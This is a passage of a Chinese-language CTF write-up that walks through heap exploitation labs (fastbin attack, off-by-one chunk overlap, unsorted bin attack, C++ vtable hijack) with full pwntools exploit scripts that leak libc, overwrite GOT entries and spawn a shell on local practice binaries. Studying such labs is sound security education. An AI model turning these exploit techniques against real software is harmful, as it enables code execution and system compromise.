| io.sendlineafter(" :", "nb") 1124 | 1125 | def remove(idx): 1126 | io.sendlineafter(" : ", "3") 1127 | io.sendlineafter(":", str(idx)) 1128 | 1129 | if __name__ == "__main__": 1130 | # io = process("./secretgarden", {"LD_PRELOAD": "./libc-2.23.so"}) 1131 | io = process("./secretgarden") 1132 | 1133 | Raise(0x50, "000") # 0 1134 | Raise(0x50, "111") # 1 1135 | 1136 | remove(0) # 0 1137 | # pause() 1138 | remove(1) # 1 -> 0 1139 | remove(0) # 0 -> 1 -> 0 1140 | 1141 | magic = ELF("./secretgarden").sym["magic"] 1142 | # fakeChunk = 0x602028 + 2 - 8 1143 | fakeChunk = 0x602000+2-8 1144 | 1145 | Raise(0x50, p64(fakeChunk)) # 0 1146 | Raise(0x50, "111") # 1 1147 | Raise(0x50, "000") 1148 | # DEBUG() 1149 | # payload = cyclic(8 - 2) + p64(magic) * 8 1150 | payload = cyclic(8 + 8 - 2) + p64(magic) * 2 1151 | Raise(0x50, payload) 1152 | 1153 | io.interactive() 1154 | io.close() 1155 | 1156 | ``` 1157 | 1158 | - 以上的 exp 实现了通过 fastbin attack 来修改 got, 实际上通过 fastbin attack 来修改 \_\_malloc\_hook, \_\_realloc\_hook, \_\_free\_hook, IO\_file\_plus 结构体中的 jump\_table 也是很常见的做法, 尤其是程序开了 Full Relro 保护时 1159 | - pwnable.tw 的 Secret Garden 一题就用到了以上几种做法, 可以参考这篇 [writeup](http://tacxingxing.com/2018/02/20/pwnabletw-secretgarden/) 1160 | - 参考了 [veritas501](https://veritas501.space/2018/03/27/调教pwndbg/) 师傅的文章, 我在我的 [fork](https://github.com/0x01f/Pwngdb) 里也加入了快速利用 fastbin attack 的函数 fake\_fastbin\_all 1161 | 1162 | 1163 | ### lab13-heapcreator 1164 | 1165 | 在 edit\_heap 中有一个故意留下来的 off-by-one,并且不是 off-by-one null byte,因此我们就可以有很大自由度地控制下一个 chunk 的 size, 可以使用 extended chunk 这种技巧造成 overlapping chunk,进而通过将 \*content 覆写为某函数的 got (如 free/atoi) 就可以 leak 出 libc 的地址,然后再改写为 system 的地址,控制参数即可 get shell 1166 | 1167 | 关于 extended chunk 的介绍可以看这个 **[slide](https://github.com/M4xW4n9/slides/blob/master/pwn_heap/advanceheap-160113090848.pdf)** 1168 | 1169 | ```python 1170 | lab13 [master●] cat solve.py 1171 | #!/usr/bin/env python 1172 | # -*- coding: utf-8 -*- 1173 | __Auther__ = 'M4x' 1174 | 1175 | from pwn import * 1176 | context.log_level = "debug" 1177 | 1178 | def create(size, content): 1179 | io.sendlineafter(" :", "1") 1180 | io.sendlineafter(" : ", str(size)) 1181 | io.sendlineafter(":", content) 1182 | 1183 | def edit(idx, content): 1184 | io.sendlineafter(" :", "2") 1185 | io.sendlineafter(" :", str(idx)) 1186 | io.sendlineafter(" : ", content) 1187 | 1188 | def show(idx): 1189 | io.sendlineafter(" :", "3") 1190 | io.sendlineafter(" :", str(idx)) 1191 | 1192 | def delete(idx): 1193 | io.sendlineafter(" :", "4") 1194 | io.sendlineafter(" :", str(idx)) 1195 | 1196 | if __name__ == "__main__": 1197 | io = process("./heapcreator", {"LD_LOADPRE": "/lib/x86_64-linux-gnu/libc.so.6"}) 1198 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 1199 | 1200 | create(0x18, '0000') # 0 1201 | create(0x10, '1111') # 1 1202 | 1203 | payload = "/bin/sh\0" + cyclic(0x10) + p8(0x41) 1204 | edit(0, payload) # overwrite 1 1205 | 1206 | delete(1) # overlapping chunk 1207 | 1208 | freeGot = 0x0000000000602018 1209 | payload = p64(0) * 4 + p64(0x30) + p64(freeGot) 1210 | create(0x30, payload) 1211 | show(1) 1212 | 1213 | libcBase = u64(io.recvuntil("\x7f")[-6: ].ljust(8, "\x00")) - libc.sym["free"] 1214 | success("libcBase -> {:#x}".format(libcBase)) 1215 | # pause() 1216 | edit(1, p64(libcBase + libc.sym["system"])) 1217 | 1218 | delete(0) 1219 | io.interactive() 1220 | io.close() 1221 | ``` 1222 | 1223 | ### lab14-magicheap 1224 | 在 edit\_heap() 里有 arbitrary overflow, 我们最终要达到的目的是修改全局变量 magic > 4869, 可以考虑使用 unsorted bin attack 这一技巧 1225 | unsorted bin attack 的结果是向任一地址写一个不可控的大数(unsorted bin list 的地址), 看起来比较局限, 但在某些情境下还是很有用的: 1226 | 1227 | - 修改 global\_max\_fast 为一个较大的数, 这样根据 malloc 的源码 1228 | ```C 1229 | /* 1230 | If the size qualifies as a fastbin, first check corresponding bin. 1231 | This code is safe to execute even if av is not yet initialized, so we 1232 | can try it without checking, which saves some time on this fast path. 1233 | */ 1234 | if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ())) 1235 | { 1236 | idx = fastbin_index (nb); 1237 | mfastbinptr *fb = &fastbin (av, idx); 1238 | mchunkptr pp = *fb; 1239 | ..... 1240 | ``` 1241 | 更大的 chunk 也可以被视为 fastbin, fastbin attack 的利用范围就大了很多 1242 | 1243 | - 往某一地址上写值, 比如可以在 \_\_free\_hook 前的某一地址上写入一个大数(0x7f\*\*\*\*\*\*\*\*\*\*)来满足 fastbin attack 的条件(提供 fastbin 的 size) 1244 | 1245 | unsorted bin attack 的原理也很简单, unsorted bin 的自己实现了 unlink 的功能, 没有使用宏定义 1246 | ```C 1247 | bck = victim->bk; 1248 | ...... 1249 | /* remove from unsorted list */ 1250 | unsorted_chunks (av)->bk = bck; 1251 | bck->fd = unsorted_chunks (av); 1252 | 1253 | ``` 1254 | 可以看出, 如果我们能控制 unsorted bin 的bk 为地址 target - 16, 那么在 bck -> fd = unsorted\_chunks(av) 这一步时, target 就会被写入 unsorted bin 的地址. 但同时也要注意此时 unsorted bin list 已经被破坏, 下次再有 unsorted bin 的操作就会引起 crash 1255 | 1256 | ```python 1257 | #!/usr/bin/env python 1258 | # -*- coding: utf-8 -*- 1259 | __Auther__ = 'M4x' 1260 | 1261 | from pwn import * 1262 | from time import sleep 1263 | import sys 1264 | context.log_level = "debug" 1265 | context.terminal = ["deepin-terminal", "-x", "sh", "-c"] 1266 | 1267 | io = process("./magicheap") 1268 | elf = ELF("./magicheap") 1269 | # libc = ELF("") 1270 | 1271 | def DEBUG(): 1272 | raw_input("DEBUG: ") 1273 | gdb.attach(io) 1274 | 1275 | 1276 | def create(size, content, attack = False): 1277 | io.sendlineafter("choice :", "1") 1278 | io.sendlineafter(" : ", str(size)) 1279 | io.sendlineafter(":", content) 1280 | 1281 | 1282 | def edit(idx, size, content): 1283 | io.sendlineafter("choice :", "2") 1284 | io.sendlineafter(" :", str(idx)) 1285 | io.sendlineafter(" : ", str(size)) 1286 | io.sendlineafter(" : ", content) 1287 | 1288 | def delete(idx): 1289 | io.sendlineafter("choice :", "3") 1290 | io.sendlineafter(" :", str(idx)) 1291 | 1292 | 1293 | if __name__ == "__main__": 1294 | create(0x10, 'aaaa') 1295 | create(0x80, 'bbbb') 1296 | create(0x10, 'cccc') 1297 | 1298 | delete(1) 1299 | 1300 | payload = cyclic(0x10) + p64(0) + p64(0x91) + p64(0) + p64(elf.symbols["magic"] - 0x10) 1301 | edit(0, 0x10 + 0x20, payload) 1302 | 1303 | create(0x80, 'dddd') 1304 | 1305 | io.sendlineafter("choice :", "4869") 1306 | io.interactive() 1307 | io.close() 1308 | 1309 | ``` 1310 | 1311 | ### lab15-zoo 1312 | C++ 的 pwn 题, 这道题目没有开 NX, 也就是说可以使用 shellcode, 在 Dog::Dog, Cat::Cat 这些函数里也有很明显的通过 strcpy 实现 overflow 的漏洞, 因此这一题就可以通过溢出伪造虚表, 控制虚表指针指向 shellcode 地址来 get shell 1313 | 更多 C++ pwn 的内容可以看这个 [slide](https://github.com/M4xW4n9/slides/blob/master/pwn_others/pwnincplusplus-160217120850.pdf), 内容虽然有点老了, 但很经典 1314 | ```python 1315 | #!/usr/bin/env python 1316 | # -*- coding: utf-8 -*- 1317 | __Auther__ = 'M4x' 1318 | 1319 | from pwn import * 1320 | context.log_level = "debug" 1321 | context.binary = "./zoo" 1322 | context.terminal = ["deepin-terminal", "-x", "sh", "-c"] 1323 | 1324 | def addDog(name, weight): 1325 | io.sendlineafter(":", "1") 1326 | io.sendlineafter(":", name) 1327 | io.sendlineafter(":", str(weight)) 1328 | 1329 | def remove(idx): 1330 | io.sendlineafter(":", "5") 1331 | io.sendlineafter(":", str(idx)) 1332 | 1333 | def listen(idx): 1334 | io.sendlineafter(":", "3") 1335 | io.sendlineafter(":", str(idx)) 1336 | 1337 | if __name__ == "__main__": 1338 | io = process("./zoo") 1339 | nameofzoo = 0x605420 1340 | 1341 | sc = asm(shellcraft.sh()) 1342 | io.sendlineafter(":", sc + p64(nameofzoo)) 1343 | 1344 | addDog('0' * 8, 0) 1345 | addDog('1' * 8, 1) 1346 | remove(0) 1347 | vptr = nameofzoo + len(sc) 1348 | addDog('a' * 72 + p64(vptr), 2) 1349 | listen(0) 1350 | 1351 | io.interactive() 1352 | io.close() 1353 | ``` 1354 | 1355 | --------------------------------------------------------------------------------